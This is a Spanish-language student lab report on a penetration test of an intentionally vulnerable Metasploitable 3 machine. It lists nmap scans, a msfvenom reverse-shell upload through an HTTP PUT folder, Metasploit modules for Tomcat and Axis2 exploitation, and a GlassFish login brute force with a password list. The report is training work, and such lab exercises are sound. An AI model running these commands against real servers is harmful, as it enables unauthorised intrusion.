Documentos de Académico
Documentos de Profesional
Documentos de Cultura
1
Participante:
JOHN ALEJANDRO ACOSTA CHACON
2
CONTENIDO
Tabla de contenido
Introducción .................................................................................................................. 4
Objetivos ....................................................................................................................... 4
Desarrollo Del Trabajo ................................................................................................... 5
Bibliografía.................................................................................................................. 20
3
Introducción
Este componente practico tiene la finalidad de poder validar todas las capacidades de los
ingenieros encargados en el proyecto para que se evidencie los estándares de calidad y
seguridad bajo la respectiva normatividad vigente.
Objetivos
4
Desarrollo Del Trabajo
5
Fg:2 Instalación Vagrant
6
Se realiza el levantamiento o ejecución de lo que se configuro junto con la maquina
necesaria, en esta instancia inicia a instalar la máquina virtual con el sistema operativo
Windows server 2008, esperamos que termine la instalación y despliegue.
7
Explotación Vulnerabilidades Metasploitable 3
Verificamos el puerto por interfaz y nos podemos dar cuenta que pertenece a un
servicio WAMP
8
Procedemos a correr otra herramienta llamada Nikto donde nos va aparecer muchas más
información sobre puertos y demás y temas más a fondo de dicha vulnerabilidad, ya que al
investigar la página nos damos cuenta que hay una carpeta Uploads vulnerable e
interesante
Aquí podemos ver que el directorio Upload con el método HTTP UP nos permite cargar
archivos, aquí podemos montar un archivo malicioso y esto puede ser parte de nuestro
ataque.
Ahora con msfvenon procedemos a preparar el archivo que vamos a cargar y poder explotar
dicha vulnerabilidad
9
Se genera la conexión reversa bajo el archivo implementado
Finalmente se logró atacar el servidor cargando un archivo malicioso bajo las herramientas
ya mencionadas y logramos obtener acceso a los archivos y parámetros del servidor WEB.
Cuando abrimos el puerto bajo interfaz nos podemos dar cuenta que lleva un servicio
bajo TOMCAT
10
Fg:13 Servicio Metasploitable 3
Vamos a utilizar un programa llamado psexec donde nos va permitir ingresar bajo el
puerto 445
11
Para obtener la credencial debemos usar esta clave con Metasploit.
Ejecutamos:
▪ use exploit/multi/http/tomcat_mgr_upload
▪ set rhost 172.16.3.122
▪ set rport 8282
▪ set HttpUsername sploit
▪ set HttpPassword sploit
▪ exploit
12
Fg:16 Servicio Metasploitable 3
Ahora iniciamos sesión bajo el módulo de sesión con instancia de administración web
usando clave y usuario especifico
Ejecutamos:
▪ use exploit/multi/http/axis2_deployer
▪ set rhost 172.16.3.122
▪ set rport 8282
▪ exploit
De esta forma nos damos cuenta de que logramos vulnerar nuestro servidor web bajo
TOMCAT y las herramientas usadas en este pentest practico.
13
▪ Vulnerabilidad contra servicio GLASSFISH
Procedemos a ejecutar scan del objetivo el cual es el mismo que estamos trabajando
Ejecutamos: nmap -p 4848 -sV 172.16.3.122
Procedemos a la verificación del servicio bajo interfaz y nos damos cuenta que pertenece
a un servicio Oracle llamao GLASSFISH
14
Iniciamos metasplotable y cargamos el módulo el cual hace varios intentos de sesión
del panel de administración o manager realizando fuerza bruta ascendente al objetivo y
servicio.
Contraseñas
vim /root/pass.txt
metasploitable
vulnerabilities
Autounattend
Contributing
security
exploits
versions
approach
building
multiple
virtualization
vagrant
sploit
Ejecutamos:
Msfconsole
use auxiliary/scanner/http/glassfish_login
set rhosts 172.16.3.122
set rport 4848
set STOP_ON_SUCCESS true
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit
15
Podemos verificar y vemos que encontramos las credenciales y usuario del servicio
16
Podemos evidenciar que logramos ingresar al servicio aprovechando la vulnerabilidad.
• Vulnerabilidad MYSQL
Al realizar análisis nos damos cuenta de que hay un servicio MYSQL, podemos
evidenciar que un usuario no esta protegido bajo contraseñas seguras, se procede a
realizar ataque con metasploit
Ejecutamos:
17
Fg:24 Servicio Metasploitable 3
Topología Laboratorio
Fg:25 Topología
18
Recomendaciones y remediación
• Para todos los servicios que se tienen se debe emplear las buenas
prácticas de seguridad y contraseñas, para todo activo y servicio interno
o externo
19
Bibliografía
20